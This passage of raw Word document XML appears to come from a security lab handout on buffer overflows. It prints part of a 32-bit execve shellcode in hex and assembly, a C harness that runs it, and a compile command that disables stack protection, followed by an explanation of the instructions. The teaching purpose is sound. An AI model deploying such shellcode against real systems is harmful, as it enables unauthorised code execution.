              </w:rPr>
              <w:t>%ebx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1097" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="249" w:lineRule="exact"/>
              <w:ind w:right="47"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="249" w:lineRule="exact"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="700" w:footer="0" w:top="1280" w:bottom="280" w:left="1280" w:right="1000"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="2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"/>
        <w:gridCol w:w="1963"/>
        <w:gridCol w:w="916"/>
        <w:gridCol w:w="654"/>
        <w:gridCol w:w="523"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="2355"/>
        <w:gridCol w:w="1227"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="268" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246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63" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="243" w:lineRule="exact"/>
              <w:ind w:left="65"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"\x89\xe1"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="160" w:lineRule="auto" w:before="39"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="243" w:lineRule="exact"/>
              <w:ind w:left="43" w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="523" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="243" w:lineRule="exact"/>
              <w:ind w:left="67"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>8:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="243" w:lineRule="exact"/>
              <w:ind w:left="68"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="243" w:lineRule="exact"/>
              <w:ind w:left="265"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>%esp,%ecx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1227" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="160" w:lineRule="auto" w:before="39"/>
              <w:ind w:right="42"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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3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"\x99"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="43" w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="523" w:type="dxa"/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9:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="68"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>cdq</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="235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line="251" w:lineRule="exact"/>
              <w:ind w:right="42"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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3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"\xb0\x0b"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="43" w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="523" w:type="dxa"/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10:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="68"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>movb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355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$0x0b,%al</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1227" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="42"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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3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"\xcd\x80"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="43" w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="523" w:type="dxa"/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11:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="68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2355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$0x80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1227" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="42"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="230" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="50"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:w w:val="99"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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35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9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="218" w:lineRule="auto" w:before="107"/>
        <w:ind w:left="16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main(int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argc,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char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>argv)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="241" w:lineRule="exact"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="261" w:lineRule="auto" w:before="22"/>
        <w:ind w:left="552" w:right="6392"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>buf[sizeof(code)];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>strcpy(buf, code);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((void(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)(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>))buf)(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="207" w:lineRule="exact"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="498"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>use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following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>compile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code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>(don’t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>forget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rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-51"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>option):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94"/>
        <w:ind w:left="421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gcc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-z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execstack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-o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call_shellcode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call_shellcode.c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="247" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A few places in this shellcode are worth mentioning.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>First, the third instruction pushes “//sh”, rather</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>than “/sh” into the stack. This is because we need a 32-bit number here, and “/sh” has only 24 bits. Fortu-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>nately, “//” is equivalent to “/”, so we can get away with a double slash symbol. Second, before calling the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>execve() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>system call, we need to store </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>name[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>(the address of the string), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>(the address of the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>array), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>NULL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>%ebx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>%ecx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>%edx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>registers, respectively.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Line 5 stores </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>name[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>%ebx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Line 8 stores </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>%ecx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>; Line 9 sets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>%edx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to zero.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>There are other ways to set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>%edx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>to zero (e.g.,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>xorl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>%edx,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>%edx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>);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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>cdq</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)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simply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shorter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>instruction:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>copies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sign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>31)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52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EAX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(which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point)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bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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EDX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>register,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>basically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
